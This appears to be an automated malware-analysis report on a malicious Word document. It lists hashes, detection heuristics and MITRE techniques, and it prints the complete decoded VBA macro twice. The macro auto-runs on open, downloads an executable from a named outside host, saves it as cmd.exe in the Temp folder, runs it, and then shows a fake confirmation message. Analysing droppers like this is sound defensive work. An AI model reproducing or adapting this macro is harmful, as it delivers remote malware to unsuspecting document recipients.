Office (OLE) malware analysis — malicious · 1a4a4b5d6693f128

MALICIOUS

Office (OLE)

463.0 KB Created: 2017-01-28 17:23:00 Authoring application: Microsoft Office Word First seen: 2017-02-23

MD5: 7b14acdd2c78ba709d852a67397bff21 SHA-1: d0b4e491f2146ccfd0582f3b2e0f9e908c1ae754 SHA-256: 1a4a4b5d6693f128bbf914b561028ff0dc78bcfdd3b0bc745848ac5149d741b1

470 Risk Score

Malware Insights

MITRE ATT&CK

T1203 Exploitation for Client Execution T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample leverages a critical vulnerability (CVE-2007-3899) in Microsoft Word, indicated by multiple high and critical heuristic firings. The VBA macro uses `CreateObject("MSXML2.XMLHTTP")` and `CreateObject("wscript.shell")` to download a file from `the embedded link and `the embedded link saving it to disk and then executing it. This behavior is consistent with a dropper malware.

Heuristics 12

CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899

Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
VBA macros detected medium 6 related findings OLE_VBA_MACROS

Document contains VBA macro code
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
mejdionq = "wscript.shell"
```
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
ADOStream.Write XMLHTTP.responseBody
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set http = CreateObject(ghjuyfg)
```
cmd.exe reference in VBA high OLE_VBA_CMD

cmd.exe reference in VBA
Matched line in script
```
lqjeneik = "C:\Windows\Temp\cmd.exe"
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Sub Document_Open()
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND

Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://creatives.name/MdR85S Referenced by macro
- http://vialibrecartagena.org/fire.exeReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2518 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2518 bytes
SHA-256: `758fee833ea8afb9247469ea5ac85475d1eaeeb04a35e41a4709212608e0f501`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() sdfsdgof = hjkfgh(True) fsdcggfoqp = lqoqjmnen(False) ghjuyfg = ikjsdhfh(True) ghfhpzS = klqoijnu(False) fghgh = lqjeneik(False) dfg = mejdionq(True) dfsg = dgdfgqew(True) sdfdrf = lsojkasuj(False) Set http = CreateObject(ghjuyfg) http.Open sdfdrf, Replace(dfsg, "\", "/"), "False" http.send Set http = Nothing ojfdsgi9u ghfhpzS, fghgh, sdfdrf, sdfsdgof, fsdcggfoqp CreateObject(dfg).Run """" & fghgh & """" Word.ActiveDocument.Range.Select Selection.WholeStory Selection.Delete Unit:=wdCharacter, Count:=1 Selection.Font.Color = wdColorWhite Selection.Font.Bold = wdToggle Selection.TypeParagraph Selection.TypeText Text:="THANK YOU! SOON YOU WILL BE RECIEVE CONFIRMATION E-MAIL " End Sub Function ojfdsgi9u(ByVal URL$, ByVal LocalPath$, ByVal kdjfi$, ByVal ksdjf$, ByVal oertuiy$) As Boolean Dim XMLHTTP, ADOStream, FileName On Error Resume Next: Kill LocalPath$ Set XMLHTTP = CreateObject(ksdjf$) XMLHTTP.Open kdjfi$, Replace(URL$, "\", "/"), "False" XMLHTTP.send If XMLHTTP.StatusText = "OK" Then Set ADOStream = CreateObject(oertuiy$) ADOStream.Type = 1: ADOStream.Open ADOStream.Write XMLHTTP.responseBody ADOStream.SaveToFile LocalPath$, 2 ADOStream.Close: Set ADOStream = Nothing DownloadFile = True Else End If Set XMLHTTP = Nothing End Function Function ikjsdhfh(ByVal kdjso$) If kdjso$ = True Then ikjsdhfh = "MSXML2.XMLHTTP" End If End Function Function mejdionq(ByVal sdfgqw$) If sdfgqw$ = True Then mejdionq = "wscript.shell" End If End Function Function dgdfgqew(ByVal kqorhnr$) If kqorhnr$ = True Then dgdfgqew = "http://creatives.name/MdR85S" End If End Function Function lsojkasuj(ByVal jqoroej$) If jqoroej$ = False Then lsojkasuj = "GET" End If End Function Function lqjeneik(ByVal klqlwo$) If klqlwo$ = False Then lqjeneik = "C:\Windows\Temp\cmd.exe" End If End Function Function klqoijnu(ByVal ppqowo$) If ppqowo$ = False Then klqoijnu = "http://vialibrecartagena.org/fire.exe" End If End Function Function hjkfgh(ByVal sdfgqw$) If sdfgqw$ = True Then hjkfgh = "Microsoft.XMLHTTP" End If End Function Function lqoqjmnen(ByVal sdfgqw$) If sdfgqw$ = False Then lqoqjmnen = "ADODB.Stream" End If End Function

SHA-256: 758fee833ea8afb9247469ea5ac85475d1eaeeb04a35e41a4709212608e0f501

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
sdfsdgof = hjkfgh(True)
fsdcggfoqp = lqoqjmnen(False)
ghjuyfg = ikjsdhfh(True)
ghfhpzS = klqoijnu(False)
fghgh = lqjeneik(False)
dfg = mejdionq(True)
dfsg = dgdfgqew(True)
sdfdrf = lsojkasuj(False)
Set http = CreateObject(ghjuyfg)
http.Open sdfdrf, Replace(dfsg, "\", "/"), "False"
http.send
Set http = Nothing
ojfdsgi9u ghfhpzS, fghgh, sdfdrf, sdfsdgof, fsdcggfoqp
CreateObject(dfg).Run """" & fghgh & """"
Word.ActiveDocument.Range.Select
Selection.WholeStory
Selection.Delete Unit:=wdCharacter, Count:=1
Selection.Font.Color = wdColorWhite
Selection.Font.Bold = wdToggle
Selection.TypeParagraph
Selection.TypeText Text:="THANK YOU! SOON YOU WILL BE RECIEVE CONFIRMATION E-MAIL "

End Sub
Function ojfdsgi9u(ByVal URL$, ByVal LocalPath$, ByVal kdjfi$, ByVal ksdjf$, ByVal oertuiy$) As Boolean
Dim XMLHTTP, ADOStream, FileName
On Error Resume Next: Kill LocalPath$
Set XMLHTTP = CreateObject(ksdjf$)
XMLHTTP.Open kdjfi$, Replace(URL$, "\", "/"), "False"
XMLHTTP.send
If XMLHTTP.StatusText = "OK" Then
Set ADOStream = CreateObject(oertuiy$)
ADOStream.Type = 1: ADOStream.Open
ADOStream.Write XMLHTTP.responseBody
ADOStream.SaveToFile LocalPath$, 2
ADOStream.Close: Set ADOStream = Nothing
DownloadFile = True
Else
End If
Set XMLHTTP = Nothing
End Function
Function ikjsdhfh(ByVal kdjso$)
If kdjso$ = True Then
ikjsdhfh = "MSXML2.XMLHTTP"
End If
End Function
Function mejdionq(ByVal sdfgqw$)
If sdfgqw$ = True Then
mejdionq = "wscript.shell"
End If
End Function
Function dgdfgqew(ByVal kqorhnr$)
If kqorhnr$ = True Then
dgdfgqew = "http://creatives.name/MdR85S"
End If
End Function
Function lsojkasuj(ByVal jqoroej$)
If jqoroej$ = False Then
lsojkasuj = "GET"
End If
End Function
Function lqjeneik(ByVal klqlwo$)
If klqlwo$ = False Then
lqjeneik = "C:\Windows\Temp\cmd.exe"
End If
End Function
Function klqoijnu(ByVal ppqowo$)
If ppqowo$ = False Then
klqoijnu = "http://vialibrecartagena.org/fire.exe"
End If
End Function
Function hjkfgh(ByVal sdfgqw$)
If sdfgqw$ = True Then
hjkfgh = "Microsoft.XMLHTTP"
End If
End Function
Function lqoqjmnen(ByVal sdfgqw$)
If sdfgqw$ = False Then
lqoqjmnen = "ADODB.Stream"
End If
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.